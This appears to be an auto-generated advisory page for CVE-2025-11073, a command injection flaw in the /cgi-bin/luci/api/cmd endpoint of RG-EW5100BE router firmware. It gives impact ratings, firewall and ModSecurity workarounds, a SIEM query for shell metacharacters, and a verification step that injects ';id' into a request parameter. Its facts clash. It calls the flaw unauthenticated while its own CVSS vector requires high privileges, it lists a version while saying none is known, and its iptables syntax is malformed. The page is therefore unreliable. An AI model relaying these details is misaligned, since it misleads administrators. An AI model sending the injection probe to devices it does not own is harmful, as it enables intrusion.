CVE-2025-11073 – This vulnerability allows remote attackers to e... (How to Fix)

Q: What is the severity of CVE-2025-11073?

CVE-2025-11073 has a CVSS score of 4.7 (MEDIUM). This vulnerability allows remote attackers to execute arbitrary commands on Keyfactor RG-EW5100BE devices by injecting malicious commands through the /cgi-bin/luci/api/cmd endpoint. The vulnerability affects systems running EW_3.0B11P280_EW5100BE-PRO_12183019 firmware. Attackers can exploit this without authentication to gain control of affected devices.

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary commands on Keyfactor RG-EW5100BE devices by injecting malicious commands through the /cgi-bin/luci/api/cmd endpoint. The vulnerability affects systems running EW_3.0B11P280_EW5100BE-PRO_12183019 firmware. Attackers can exploit this without authentication to gain control of affected devices.

💻 Affected Systems

Products:

Keyfactor RG-EW5100BE

Versions: EW_3.0B11P280_EW5100BE-PRO_12183019

Operating Systems: Embedded Linux (firmware-specific)

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the default configuration of the specified firmware version. No special configuration is required for exploitation.

⚠️ Manual Verification Required

This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.

Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).

🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.

Recommended Actions:

Review the CVE details at NVD
Check vendor security advisories for your specific version
Test if the vulnerability is exploitable in your environment
Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing attackers to install persistent backdoors, pivot to internal networks, exfiltrate sensitive data, or use the device as part of a botnet.

🟠

Likely Case

Attackers gain shell access to execute commands, potentially installing cryptocurrency miners, conducting DDoS attacks, or using the device for network reconnaissance.

🟢

If Mitigated

Limited impact with proper network segmentation and monitoring, potentially only affecting the isolated device without lateral movement.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable via HTTP POST requests, making internet-facing devices immediate targets.

🏢 Internal Only: MEDIUM - Internal devices are still vulnerable but require network access; risk increases if attackers gain initial foothold elsewhere.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Proof-of-concept exploit code is publicly available on GitHub, making exploitation trivial for attackers with basic skills.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: UNKNOWN

Vendor Advisory: NOT AVAILABLE

Restart Required: No

Instructions:

No official patch is currently available. Monitor Keyfactor security advisories for updates. Consider workarounds or device replacement if no patch is forthcoming.

🔧 Temporary Workarounds

Network Access Control

all

Restrict access to the vulnerable endpoint using firewall rules or network segmentation

iptables -A INPUT -p tcp --dport 80 -s ! TRUSTED_IP -j DROP
iptables -A INPUT -p tcp --dport 443 -s ! TRUSTED_IP -j DROP

Web Application Firewall

all

Deploy WAF rules to block command injection patterns in POST requests to /cgi-bin/luci/api/cmd

ModSecurity rule: SecRule ARGS:url "@rx [;&|`$()]" "id:1001,phase:2,deny,msg:'Command Injection Attempt'"

🧯 If You Can't Patch

Isolate affected devices in a separate VLAN with strict egress filtering
Implement network monitoring for unusual outbound connections or command execution patterns

🔍 How to Verify

Check if Vulnerable:

Check firmware version via web interface or SSH: cat /etc/version | grep EW_3.0B11P280

Check Version:

ssh admin@device_ip 'cat /etc/version' or check web admin interface

Verify Fix Applied:

Test if command injection is possible by sending a POST request to /cgi-bin/luci/api/cmd with url parameter containing ;id (monitor response for command output)

📡 Detection & Monitoring

Log Indicators:

POST requests to /cgi-bin/luci/api/cmd containing shell metacharacters (;, &, |, `, $)

Network Indicators:

Unusual outbound connections from device, especially to known C2 servers or cryptocurrency pools

SIEM Query:

source="device_logs" AND uri="/cgi-bin/luci/api/cmd" AND (url="*;*" OR url="*&*" OR url="*|*" OR url="*`*" OR url="*$(*")

📊 Metadata

CVE ID: CVE-2025-11073

CVSS v3 Score: 4.7 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

CWE: CWE-74

EPSS Score: 0.3% exploit probability (52.9th percentile)

Published: September 27, 2025

Last Updated: September 29, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-11073, you might also want to check these: